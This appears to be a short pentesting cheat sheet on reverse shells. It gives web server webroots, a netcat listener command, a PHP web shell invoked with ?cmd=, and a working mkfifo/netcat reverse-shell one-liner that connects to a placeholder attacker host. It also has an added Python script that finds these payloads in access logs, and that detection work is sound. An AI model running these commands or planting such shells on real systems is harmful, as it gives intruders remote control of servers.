Reverse Shells

Command injection

To execute the reverse shell, we first need to be able to inject commands:

Command injection
Default Webroot for common web servers
Apache    /var/www/html/
Nginx     /usr/local/nginx/html/
IIS       C:\inetpub\wwwroot\
XAMPP     C:\xampp\htdocs\
Accessing the reverse shell
#Listening for the reverse shell with netcat
nc -lnvp Port

#Once the malicious shell script is passed to the victim:
 ##In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here

 ##Directly from the terminal (quote the URL so the shell does not interpret the ?)
curl "http://server_ip:port/shellScript.php?cmd=your_command_here"

Scripts

PHP
#Get netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f
 ##Adapted for PHP
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f"); ?>
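
Detection side: the `?cmd=` request and the mkfifo/netcat payload above leave recognizable traces in web server access logs. The following is an added example, not part of the original page, that scans combined-format log lines for them. The log lines are constructed, and the indicator list and parameter names are assumptions to tune for your environment.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache/Nginx combined log format: client IP ... "METHOD target PROTO" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Indicators taken from the payload shown on this page (assumed list; tune locally).
INDICATORS = {
    "mkfifo": re.compile(r"\bmkfifo\s+/"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "netcat_connect": re.compile(r"\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"),
}
COMMAND_PARAMS = {"cmd", "command", "exec"}  # assumed parameter names

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=2 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /shellScript.php?cmd=id HTTP/1.1" 200 54',
    '203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /shellScript.php?cmd=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%20198.51.100.9%204444%20%3E/tmp/f HTTP/1.1" 200 0',
]


def normalize(value, max_rounds=3):
    """Undo nested URL encoding so %2520-style values are still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    url = urlsplit(m["target"])
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = normalize(raw)  # parse_qsl already decoded one layer
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
        if hits or name.lower() in COMMAND_PARAMS:
            return {"ip": m["ip"], "path": url.path, "param": name,
                    "severity": "high" if hits else "review", "indicators": hits}
    return None


def scan_log(lines):
    return [finding for finding in map(scan_line, lines) if finding]
```

A "review" finding only means a command-style parameter name was seen; "high" means the decoded value matched at least one payload indicator.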

Online shell lists/generators

Revshells

PayloadAllTheThings/Reverse
